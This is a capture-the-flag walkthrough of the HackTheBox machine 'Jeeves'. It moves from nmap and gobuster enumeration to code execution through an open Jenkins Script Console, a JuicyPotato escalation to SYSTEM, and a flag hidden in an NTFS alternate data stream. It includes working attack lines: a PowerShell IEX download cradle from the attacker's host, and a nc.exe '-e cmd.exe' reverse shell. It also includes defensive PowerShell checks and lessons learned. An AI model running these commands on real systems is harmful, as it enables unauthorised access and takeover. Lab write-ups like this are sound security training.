Jeeves

Reconnaissance

First we want to run an initial nmap scan to see which ports are open and what services are listening on them.

nmap -sC -sV -oA nmap/init 10.129.174.184
  • -sC: run the default nmap script set

  • -sV: detect service versions

  • -oA: write output in all three formats (nmap, gnmap, xml) with the prefix nmap/init

We get back the following information:

init.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 20:19 EDT
Nmap scan report for 10.129.174.184
Host is up (0.034s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-03-24T05:19:57
|_  start_date: 2022-03-24T05:08:21
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m57s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.19 seconds

Enumeration

Passive Enumeration

IIS Directory Enumeration

gobuster dir -u http://10.129.174.184 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o iis.txt

Jetty Directory Enumeration

gobuster dir -u http://10.129.174.184:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o jetty.txt

Active Enumeration

Exploring IIS

Browsing to the IIS site on port 80 we are presented with a search bar.

Searching takes you to error.html, which turns out to be just an image.

error.html

The page source shows why: the form's action is error.html and the text input has no name attribute, so whatever you type is never sent to the server. The search box is purely cosmetic and there is nothing to attack here.

<!DOCTYPE html>
<html>
<head>
<title>Ask Jeeves</title>
<link rel="stylesheet" type="text/css" href="style.css">
</head>

<body>
<form class="form-wrapper cf" action="error.html">
    <div class="byline"><p><a href="#">Web</a>, <a href="#">images</a>, <a href="#">news</a>, and <a href="#">lots of answers</a>.</p></div>
  	<input type="text" placeholder="Search here..." required>
	  <button type="submit">Search</button>
    <div class="byline-bot">Skins</div>
</form>
</body>

</html>

Exploring Jetty

Quickly checking the gobuster output for Jetty shows a directory worth checking out:

/askjeeves

Going there we see Jenkins!

Jenkins

It turns out anonymous users have full access, including the Script Console (Manage Jenkins > Script Console, served at /askjeeves/script), which runs arbitrary Groovy on the server. That gives us command execution without logging in, which works in our favor.

Initial Access

Using Nishang's Invoke-PowerShellTcp.ps1 script we can create a reverse shell and get access to the box.

First we want to append the example invocation from the script's own header comment to the bottom of the file, e.g. Invoke-PowerShellTcp -Reverse -IPAddress <kali ip> -Port <listener port>, so that the function is actually called as soon as the file is evaluated on the machine we are attacking.

Next we want a web server to host the script and a netcat listener to catch the reverse shell. In this case I am using updog for my simple web server.

Using the script console again, I run a one-liner that has the Jenkins user download the script from my web server and execute it in memory (a PowerShell IEX download cradle).

And we get a shell back!

This allows us to get user.txt!

Privilege Escalation

Juicy Potato

Next we want to run PowerUp.ps1 from PowerSploit; the dev branch is used because it has extra checks.

Then we want to run these commands in our reverse shell

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.92/PowerUp.ps1')
Invoke-AllChecks # runs every PowerUp privilege escalation check

Right away we see that our user (kohsuke, the account Jenkins runs as) holds SeImpersonatePrivilege. That is the prerequisite for the "potato" family of token impersonation attacks, and on this Windows 10 build JuicyPotato is the one to reach for.
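As an added example (not from the original writeup or from PowerUp), this is the check I would run inside the reverse shell before bothering to download JuicyPotato. It confirms the two facts the attack depends on: the token holds an impersonation privilege, and the OS build is old enough for JuicyPotato's DCOM trick, which Microsoft closed in Windows 10 1809 / Server 2019 (build 17763). The function and field names are my own.

```powershell
# Added example: confirm potato prerequisites from the current token.
# Assumption: run as the Jenkins service user inside the reverse shell.

function Test-PotatoPrerequisites {
    # whoami /priv /fo csv prints "Privilege Name","Description","State".
    # A privilege counts even when State is Disabled: the token still holds
    # it and the exploit can enable it.
    $privs = whoami /priv /fo csv | ConvertFrom-Csv
    $impersonate = @($privs | Where-Object {
        $_.'Privilege Name' -in 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'
    })

    # JuicyPotato abuses DCOM activation against a rogue OXID resolver;
    # builds >= 17763 need PrintSpoofer or RoguePotato instead.
    $os    = Get-CimInstance Win32_OperatingSystem
    $build = [int]$os.BuildNumber

    $note = if ($impersonate.Count -eq 0) {
        'No impersonation privilege on this token: potatoes do not apply'
    } elseif ($build -ge 17763) {
        'Privilege present but build too new for JuicyPotato; try PrintSpoofer/RoguePotato'
    } else {
        'JuicyPotato should work; use a CLSID valid for this OS (-c) if the default fails'
    }

    [pscustomobject]@{
        User                 = (whoami)
        HeldPrivileges       = ($impersonate | ForEach-Object { "$($_.'Privilege Name') ($($_.State))" }) -join ', '
        OSCaption            = $os.Caption
        Build                = $build
        JuicyPotatoCandidate = ($impersonate.Count -gt 0) -and ($build -lt 17763)
        Note                 = $note
    }
}

Test-PotatoPrerequisites | Format-List
```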

We first need to download JuicyPotato.exe to the box; I am hosting it from my Kali box.

We also need to copy Kali's nc.exe to the Windows box so the SYSTEM process has something to call back with:

# nc.exe is located /usr/share/windows-resources/binaries/nc.exe on kali
Invoke-WebRequest "http://10.10.14.92/nc.exe" -OutFile "nc.exe"

Next, with a listener waiting on Kali (nc -lvnp 9001), we run JuicyPotato.

This is the input I used:

  • -t: * (try both CreateProcessWithTokenW and CreateProcessAsUser)

  • -p: c:\windows\system32\cmd.exe (the program to launch as SYSTEM)

  • -a: "/c c:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.14.92 9001" (its arguments: a netcat reverse shell back to Kali)

  • -l: 9001 (the local port JuicyPotato's COM server listens on; it only happens to match the nc port)

cmd /c jp.exe -l 9001 -p c:\windows\system32\cmd.exe -a "/c c:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.14.92 9001" -t *
Got a shell

We got nt authority\system!

When we take a look at the Administrator's desktop we see hm.txt with an interesting message telling us the flag is not in the file itself.

The next thing to try is listing the directory with dir /R, which also shows NTFS alternate data streams, and this reveals a second stream attached to hm.txt.

Alternate Data Streams

An NTFS file can carry extra named streams alongside its normal content; a plain dir or type only shows the default stream, so data hidden in a named stream is easy to miss.

We can redirect the named stream into more and get the flag:
C:\Users\Administrator\Desktop>more < hm.txt:root.txt
more < hm.txt:root.txt
afbc5bd4b615a606 # Only the first 16 characters of the flag shown
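As an added example (not from the original writeup), the same operation in PowerShell, which is also the check behind the lesson below that alternate data streams can be an indicator of compromise: enumerate every named stream under a directory, flag anything that is not the benign Zone.Identifier mark-of-the-web stream, and read a chosen stream directly. Path and stream names are the ones from this box; the function names are my own.

```powershell
# Added example: enumerate and read NTFS alternate data streams.
# Assumed path/stream: C:\Users\Administrator\Desktop\hm.txt:root.txt (from the writeup).

function Find-AlternateDataStreams {
    param([string]$Path = 'C:\Users\Administrator\Desktop')
    # Every file has the unnamed ':$DATA' stream; anything else is an ADS.
    # Zone.Identifier is the usual benign case (set on downloaded files).
    Get-ChildItem -Path $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            Get-Item -Path $_.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' }
        } |
        Select-Object @{ n = 'File'; e = { $_.FileName } },
                      Stream,
                      Length,
                      @{ n = 'Suspicious'; e = { $_.Stream -ne 'Zone.Identifier' } }
}

function Read-AlternateDataStream {
    param(
        [Parameter(Mandatory)][string]$File,
        [Parameter(Mandatory)][string]$Stream
    )
    # Get-Content -Stream reads the named stream; the cmd.exe equivalent
    # used above is:  more < file:stream
    Get-Content -Path $File -Stream $Stream -Raw
}

# Usage on the box:
Find-AlternateDataStreams | Format-Table -AutoSize
Read-AlternateDataStream -File 'C:\Users\Administrator\Desktop\hm.txt' -Stream 'root.txt'
```

From the defensive side, running Find-AlternateDataStreams over user profiles and web roots and diffing against a known-good baseline is a cheap hunt: executables or scripts tucked into a named stream of an innocuous file are a classic persistence and staging trick.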

Lessons Learned

  • Restrict who can access the Jenkins management interface, and the Script Console in particular: anonymous access here meant unauthenticated code execution as the Jenkins service account

  • In some instances a file using alternate data streams could be an indicator of compromise

  • Be careful which service accounts hold SeImpersonatePrivilege, as it lets an attacker who compromises that service escalate to SYSTEM with little effort